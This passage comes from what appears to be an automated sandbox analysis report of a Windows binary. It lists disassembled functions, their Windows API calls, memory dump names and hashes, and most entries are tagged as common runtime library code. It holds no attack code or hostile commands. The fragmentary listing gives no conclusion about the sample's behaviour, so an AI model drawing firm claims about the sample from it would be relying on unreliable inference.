                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B88D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                  • String ID:
                                                                  • API String ID: 3931714976-0
                                                                  • Opcode ID: 83d5a42d46c4583e28aee5b1f930c549a4262e2a22ad6edf4b14adf64f815f57
                                                                  • Instruction ID: f969b5ac99498780fbd7beb82dbab4cb84e6be87fe45c2be34c1387336848ab0
                                                                  • Opcode Fuzzy Hash: 83d5a42d46c4583e28aee5b1f930c549a4262e2a22ad6edf4b14adf64f815f57
                                                                  • Instruction Fuzzy Hash: A6517D71904224DFCB11DF98D890B9EBBF4EF14314F24859DE859AB391DB74AE40CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B50351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: __freea$__alloca_probe_16
                                                                  • String ID: a/p$am/pm
                                                                  • API String ID: 3509577899-3206640213
                                                                  • Opcode ID: f72d6361ab92ba1f84eb0b8cf1bc9fd54d96fca18bdff96eff69dd3551eb4ee6
                                                                  • Instruction ID: 60d9783723c7f1c034eb423267239d13aef0b88a3a87d3a505bc85dff9a7d0f4
                                                                  • Opcode Fuzzy Hash: f72d6361ab92ba1f84eb0b8cf1bc9fd54d96fca18bdff96eff69dd3551eb4ee6
                                                                  • Instruction Fuzzy Hash: A2C1DE35920206DBDB24AF68C989BBA77F0FF59302F2440C9ED05AB250D331AD49DFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B45978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,00B4596F,00B44900,00B4358F), ref: 00B45986
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B45994
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B459AD
                                                                  • SetLastError.KERNEL32(00000000,00B4596F,00B44900,00B4358F), ref: 00B459FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: 62710e7365c2ec2ad963f3a0fced625f1d5c586e5dd3d659564c1d1533990b81
                                                                  • Instruction ID: fa8a6e134ddabce38a7203875b150ad04ee3e7ddd64c7d2469df7fe7c04c8a99
                                                                  • Opcode Fuzzy Hash: 62710e7365c2ec2ad963f3a0fced625f1d5c586e5dd3d659564c1d1533990b81
                                                                  • Instruction Fuzzy Hash: 41018433209F12EFE63426B47C86E6A2BD4EB0277A72003ADF518961E2FE514D81B1D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B23230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTempFileNameW.KERNEL32(?,URL,00000000,?,823FDEC6,?,00000004), ref: 00B23294
                                                                  • MoveFileW.KERNEL32(?,00000000), ref: 00B2354A
                                                                  • DeleteFileW.KERNEL32(?), ref: 00B23592
                                                                    • Part of subcall function 00B21A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00B21AF7
                                                                    • Part of subcall function 00B21A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00B21B7D
                                                                    • Part of subcall function 00B22E60: LocalFree.KERNEL32(?,823FDEC6,?,?,00B63C40,000000FF,?,00B21242,823FDEC6,?,?,00B63C75,000000FF), ref: 00B22EB1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                  • String ID: URL$url
                                                                  • API String ID: 853893950-346267919
                                                                  • Opcode ID: d97b07fca1b428d73e6fe29375fcbbf71363414eb69e1c56edb7cf2293bc4dc0
                                                                  • Instruction ID: af282e79734e8d90b206419295cbeaf7c672c775be214548d6abf1eeb73b597d
                                                                  • Opcode Fuzzy Hash: d97b07fca1b428d73e6fe29375fcbbf71363414eb69e1c56edb7cf2293bc4dc0
                                                                  • Instruction Fuzzy Hash: 66C135709142689ADB24DF28DC987EDBBF4BF14704F1042D9D00DA7291EBB96B88CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B236D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00B23735
                                                                  • GetLastError.KERNEL32(?,?,?,00B64215,000000FF), ref: 00B2381A
                                                                    • Part of subcall function 00B22310: GetProcessHeap.KERNEL32 ref: 00B22365
                                                                    • Part of subcall function 00B246F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00B23778,-00000010,?,?,?,00B64215,000000FF), ref: 00B24736
                                                                  • _wcschr.LIBVCRUNTIME ref: 00B237C6
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00B64215,000000FF), ref: 00B237DB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                  • String ID: ntdll.dll
                                                                  • API String ID: 3941625479-2227199552
                                                                  • Opcode ID: f9c7209e93886215fa4cd186fb3ab55c6eecbf0a380d91dfd518052ed5ef954b
                                                                  • Instruction ID: d15adb4d459ffe4208dc5f2b54f0c2815077d127de59afb86309d6a1c4709295
                                                                  • Opcode Fuzzy Hash: f9c7209e93886215fa4cd186fb3ab55c6eecbf0a380d91dfd518052ed5ef954b
                                                                  • Instruction Fuzzy Hash: A941D2716006159FDB10DF68DC45BAEB7E4FF14710F1446A9E92A9B2D0EBB49B04CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B21A20: LocalFree.KERNEL32(?), ref: 00B21A42
                                                                    • Part of subcall function 00B43E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B21434,?,?,00B2D341,00B21434,00B78B5C,?,00B21434,?,00000000), ref: 00B43EBA
                                                                  • GetCurrentProcess.KERNEL32(823FDEC6,823FDEC6,?,?,00000000,00B64981,000000FF), ref: 00B262EB
                                                                    • Part of subcall function 00B42C98: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CA3
                                                                    • Part of subcall function 00B42C98: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CE0
                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00B262B0
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B262B7
                                                                    • Part of subcall function 00B42C4E: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C58
                                                                    • Part of subcall function 00B42C4E: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C8B
                                                                    • Part of subcall function 00B42C4E: RtlWakeAllConditionVariable.NTDLL ref: 00B42D02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                  • String ID: IsWow64Process$kernel32
                                                                  • API String ID: 1333104975-3789238822
                                                                  • Opcode ID: 3b93dfe62091420afa444fce3e45fc74e49e487faae37883a147333fac781f84
                                                                  • Instruction ID: 9ce05376e069c80a424cdfe97b2dbe615168039a6ae28565b0f308f050b35289
                                                                  • Opcode Fuzzy Hash: 3b93dfe62091420afa444fce3e45fc74e49e487faae37883a147333fac781f84
                                                                  • Instruction Fuzzy Hash: 2521C371D45615DFDB10DF94ED06B5D77F8EB18B10F2006A9F829A32E0DF7499008A61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B38451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Mpunct$GetvalsH_prolog3
                                                                  • String ID: $+xv
                                                                  • API String ID: 2204710431-1686923651
                                                                  • Opcode ID: b1129f91ea126eeb554a3c36a1acc78a5c8196c1dbdbaa4ebbefd35c09dcf15d
                                                                  • Instruction ID: d3163adeb05508111cb5c556a5a824516c51055c4df1e9511c41312ca8914a91
                                                                  • Opcode Fuzzy Hash: b1129f91ea126eeb554a3c36a1acc78a5c8196c1dbdbaa4ebbefd35c09dcf15d
                                                                  • Instruction Fuzzy Hash: 0621D6B1804B926EDB21DF74C89073BBEF8AB08300F144A9AF499C7A42D774E601CBD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B26250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(823FDEC6,823FDEC6,?,?,00000000,00B64981,000000FF), ref: 00B262EB
                                                                    • Part of subcall function 00B42C98: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CA3
                                                                    • Part of subcall function 00B42C98: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CE0
                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00B262B0
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B262B7
                                                                    • Part of subcall function 00B42C4E: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C58
                                                                    • Part of subcall function 00B42C4E: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C8B
                                                                    • Part of subcall function 00B42C4E: RtlWakeAllConditionVariable.NTDLL ref: 00B42D02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                  • String ID: IsWow64Process$kernel32
                                                                  • API String ID: 2056477612-3789238822
                                                                  • Opcode ID: f8db9dd94ea304bd2a2617b046a0167fe5bc93865544779a5f43d254f31bd0d5
                                                                  • Instruction ID: 3e4603376a1073161ca0e48e6ee08dc1f96679e511db0d77662082607b980ee4
                                                                  • Opcode Fuzzy Hash: f8db9dd94ea304bd2a2617b046a0167fe5bc93865544779a5f43d254f31bd0d5
                                                                  • Instruction Fuzzy Hash: 7111A2B2D48614DFDB10CF94ED45B99B7F8FB18B10F2006AAE829936D0EB75A900CA51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B469E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00B46AA3,?,?,00B7DDCC,00000000,?,00B46BCE,00000004,InitializeCriticalSectionEx,00B697E8,InitializeCriticalSectionEx,00000000), ref: 00B46A72
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3664257935-2084034818
                                                                  • Opcode ID: b3618b4c3fa86e55df07252a4ce2d793281682683236c54c7b4b2b1ba6d15781
                                                                  • Instruction ID: 1db86c2b66c27d815d1036fc47b0967c44ab4e7ce38180e291399f1147bff880
                                                                  • Opcode Fuzzy Hash: b3618b4c3fa86e55df07252a4ce2d793281682683236c54c7b4b2b1ba6d15781
                                                                  • Instruction Fuzzy Hash: F9119131A45A25ABDF228B689C41B5933E8DF13760F1442A0F954BB2C0DBB4EF009AD6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B52DEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,823FDEC6,?,?,00000000,00B66A6C,000000FF,?,00B52DC1,?,?,00B52D95,?), ref: 00B52E23
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B52E35
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00B66A6C,000000FF,?,00B52DC1,?,?,00B52D95,?), ref: 00B52E57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 4a0066416508306c813363476425db9a6c3bd44e60b474c11e38b04f4c129ca4
                                                                  • Instruction ID: d7aba78acce08c2763b1302594dcf741cf7a334c6cbc0cbe232b121011e67c6c
                                                                  • Opcode Fuzzy Hash: 4a0066416508306c813363476425db9a6c3bd44e60b474c11e38b04f4c129ca4
                                                                  • Instruction Fuzzy Hash: 2A016771958619ABDB129F50DC05FAEBBF8FB05B15F044565F811F32E0DFB89900CA90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B56DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __alloca_probe_16.LIBCMT ref: 00B56E40
                                                                  • __alloca_probe_16.LIBCMT ref: 00B56F01
                                                                  • __freea.LIBCMT ref: 00B56F68
                                                                    • Part of subcall function 00B55BDC: RtlAllocateHeap.NTDLL(00000000,00000000,00B53841,?,00B5543A,?,00000000,?,00B46CE7,00000000,00B53841,00000000,?,?,?,00B5363B), ref: 00B55C0E
                                                                  • __freea.LIBCMT ref: 00B56F7D
                                                                  • __freea.LIBCMT ref: 00B56F8D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1423051803-0
                                                                  • Opcode ID: 3cdfa793047a447d4291b4b64d2f15a31aaf0739be61511a43870f0c4b943274
                                                                  • Instruction ID: 9d6d42fa8920ca65a41f24abae2aa6b632ce684ffec4bd2cd3cd895dabba42a3
                                                                  • Opcode Fuzzy Hash: 3cdfa793047a447d4291b4b64d2f15a31aaf0739be61511a43870f0c4b943274
                                                                  • Instruction Fuzzy Hash: 8D51AE72A00206AFEB259FA4DC82FBF3BE9EB04752B5501E8BC04D7150EB71CD189660
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2B8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B8DD
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B900
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B928
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2B98D
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B9B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                  • String ID:
                                                                  • API String ID: 459529453-0
                                                                  • Opcode ID: 63834b17ba7b674a75bbd0d8517118fb3e2f01c79040e739dd1b807bee3ac719
                                                                  • Instruction ID: 30fd641cbfb94ab9addbb5d7215daf944223535f4672936454daaa41776043c1
                                                                  • Opcode Fuzzy Hash: 63834b17ba7b674a75bbd0d8517118fb3e2f01c79040e739dd1b807bee3ac719
                                                                  • Instruction Fuzzy Hash: 5A31D231900228DFCB11DF58E951BADBBF4EF24724F2441D9E918672A1DB30AE81CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B25890 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,?,75474450,00B25646,?,?,?,?,?), ref: 00B25898
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                  • API String ID: 1452528299-1782174991
                                                                  • Opcode ID: 3102418f99e2691af494b26f39ef21dd54e5e6294cf06d9d24451329acccbc79
                                                                  • Instruction ID: 818b449e7a08e7ee93e77d217f3f0913a9c461cc1d6c8be896196dc6edf81ad9
                                                                  • Opcode Fuzzy Hash: 3102418f99e2691af494b26f39ef21dd54e5e6294cf06d9d24451329acccbc79
                                                                  • Instruction Fuzzy Hash: D5118E56A1063587CB302F6CA800376A2E4DF50754F6548BFE88DDB391EAF98CC18394
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B31C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Maklocstr$Maklocchr
                                                                  • String ID:
                                                                  • API String ID: 2020259771-0
                                                                  • Opcode ID: 75039ecfe63db4079116fa53f77d53b71aceda7ee8d8d86c9e21e9b459d762b8
                                                                  • Instruction ID: 15bfc53490fd6fc6df991da00b12a20b058d5b78bcf88a4d187c88e14e559faa
                                                                  • Opcode Fuzzy Hash: 75039ecfe63db4079116fa53f77d53b71aceda7ee8d8d86c9e21e9b459d762b8
                                                                  • Instruction Fuzzy Hash: BF11A0B2940794BFE720DBA9C881F12B7ECEF04350F280999F649CBA41D275FC5087A9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2D87C Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B2D883
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2D88D
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • numpunct.LIBCPMT ref: 00B2D8C7
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2D8DE
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D8FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
